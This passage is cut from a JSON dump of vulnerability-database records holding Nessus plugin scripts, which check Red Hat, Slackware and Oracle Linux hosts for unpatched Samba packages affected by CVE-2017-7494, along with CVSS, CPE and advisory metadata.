value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1272\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-client-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-client-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-client-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-common-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-common-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-common-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-debuginfo-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-doc-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-doc-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-doc-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-swat-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-swat-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-swat-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-devel-3.6.23-14.el5_11\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:11:01", "description": "New samba packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.", "edition": 33, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-144-01) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:samba", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2017-144-01.NASL", "href": "https://www.tenable.com/plugins/nessus/100389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-144-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100389);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"SSA\", value:\"2017-144-01\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-144-01) (SambaCry)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New samba packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.513769\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b360dd59\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"samba\", pkgver:\"4.6.4\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.6.4\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:24", "description": "From Red Hat Security Advisory 2017:1270 :\n\nAn update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "edition": 36, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Oracle Linux 6 / 7 : samba (ELSA-2017-1270) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba-libs", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:libwbclient", "p-cpe:/a:oracle:linux:samba-vfs-glusterfs", "p-cpe:/a:oracle:linux:samba-pidl", "p-cpe:/a:oracle:linux:ctdb", "p-cpe:/a:oracle:linux:samba-devel", "p-cpe:/a:oracle:linux:samba-dc-libs", "p-cpe:/a:oracle:linux:samba-test", "p-cpe:/a:oracle:linux:samba-common-tools", "p-cpe:/a:oracle:linux:samba-doc", "p-cpe:/a:oracle:linux:samba-test-libs", "p-cpe:/a:oracle:linux:samba-domainjoin-gui", "p-cpe:/a:oracle:linux:samba-dc", "p-cpe:/a:oracle:linux:libsmbclient", "p-cpe:/a:oracle:linux:libwbclient-devel", "p-cpe:/a:oracle:linux:samba-winbind", "p-cpe:/a:oracle:linux:samba-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba-winbind-modules", "p-cpe:/a:oracle:linux:samba-common-libs", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-swat", "p-cpe:/a:oracle:linux:samba-winbind-clients", "p-cpe:/a:oracle:linux:samba-krb5-printing", "p-cpe:/a:oracle:linux:libsmbclient-devel", "p-cpe:/a:oracle:linux:samba-python", "p-cpe:/a:oracle:linux:samba-winbind-devel", "p-cpe:/a:oracle:linux:ctdb-tests", "p-cpe:/a:oracle:linux:samba-glusterfs", "p-cpe:/a:oracle:linux:samba-client-libs"], "id": "ORACLELINUX_ELSA-2017-1270.NASL", "href": "https://www.tenable.com/plugins/nessus/100396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:1270 and \n# Oracle Linux Security Advisory ELSA-2017-1270 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100396);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1270\");\n\n script_name(english:\"Oracle Linux 6 / 7 : samba (ELSA-2017-1270) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:1270 :\n\nAn update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006924.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006926.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-devel-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-client-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-common-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-doc-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-domainjoin-gui-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-swat-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-clients-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-devel-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-krb5-locator-3.6.23-43.0.1.el6_9\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ctdb-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-client-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-common-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-pidl-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-python-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-test-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.4-14.el7_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 